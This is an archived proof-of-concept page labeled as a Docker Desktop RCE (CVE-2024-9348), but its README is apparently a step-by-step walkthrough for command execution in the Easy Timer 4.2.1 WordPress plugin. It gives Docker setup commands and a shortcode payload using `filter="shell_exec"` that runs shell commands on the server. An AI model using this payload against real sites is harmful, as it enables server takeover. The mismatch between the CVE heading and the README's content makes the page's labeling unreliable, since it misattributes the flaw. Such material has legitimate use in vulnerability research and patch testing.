Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-9348 PoC — Docker Desktop 安全漏洞

Source
https://github.com/Nimisha17/CVE-2024-9348-poc
Associated Vulnerability
Title:Docker Desktop 安全漏洞 (CVE-2024-9348)
Description:Docker Desktop是美国Docker公司的一个基于容器技术的用于轻量化部署应用的桌面软件。该产品可提供桌面环境可支持在Linux/Windows/Mac OS系统上创建一个容器(轻量级虚拟机)并部署和运行应用程序,以及通过配置文件实现应用程序的自动化安装、部署和升级。 Docker Desktop v4.34.3之前版本存在安全漏洞,该漏洞源于允许通过Build视图中未清理的GitHub源链接进行远程代码执行(RCE)。
Readme
# Easy Timer v4.2.1 - 

## Prerequisites

* Docker Engine installed
* Docker Compose installed

Refer to the official Docker docs for installation: [Docker Engine Install](https://docs.docker.com/engine/install/)

## 1. Start WordPress with Docker

From your project directory:

```bash
sudo docker-compose up -d
mkdir -p wp-content/plugins
cd wp-content/plugins

wget https://downloads.wordpress.org/plugin/easy-timer.4.2.1.zip
unzip easy-timer.4.2.1.zip

sudo docker compose restart wordpress
```

## 2. Set Up WordPress

1. Navigate to `http://localhost:8000/`
2. Complete the WordPress Setup
3. Navigate to `WordPress Dashboard` → `Plugins` → `Easy Timer` and click `Activate`.
<img width="740" height="325" alt="Screenshot from 2025-10-27 12-52-06" src="https://github.com/user-attachments/assets/91f6d1b6-83c4-4781-b3fa-d5be4d218c3e" />

## 3. Add new user with Editor Privileges

From your project directory execute the following command:
```bash
docker compose run --rm wpcli user create \
  editoruser editoruser@example.com \
  --role=editor \
  --user_pass=P@ssw0rd!
```
(note: replace with your choice of user name, email and password!)

## 4. Create Post

1. Go to `Posts` → `Add New`
2. Insert a `Shortcode block` and enter:

```text
[countdown date=2025/12/17-00:00:00 filter="shell_exec"]ls -l[/countdown]
```

3. Click **Update → Preview Post** to see the timer execute.

> ⚠️ Note: Ensure you are using a **Shortcode block**, not a Paragraph block, for the shortcode to render properly.

<img width="681" height="278" alt="Screenshot from 2025-10-27 13-36-40" src="https://github.com/user-attachments/assets/00672fbd-9f1e-4a99-9508-f20f91488252" />

---
Congratz you got RCE.
<img width="944" height="620" alt="image" src="https://github.com/user-attachments/assets/2adc719c-4556-4a15-a216-9542a458c8b1" />




## Debugging Tips

* Check running containers:

```bash
sudo docker ps
```

You should see something like:

<img width="1174" height="121" alt="Screenshot from 2025-10-27 12-51-08" src="https://github.com/user-attachments/assets/41599c77-12b2-482e-b349-a79075e45ae7" />


* If shortcodes are **not rendering**:

  1. Go to **Appearance → Themes**
  2. Activate **Twenty Twenty-Three** (or another default theme).


* If navigating to `http://localhost:8000/` says **Database Not Connected**:
  1. Wait a minute or two for the Database to finish setting up
File Snapshot

 [4.0K]  /data/pocs/37c97f3453099796f39b0d54fff25229068fff9e
├── [1.1K]  docker-compose.yml
└── [2.3K]  README.md

1 directory, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.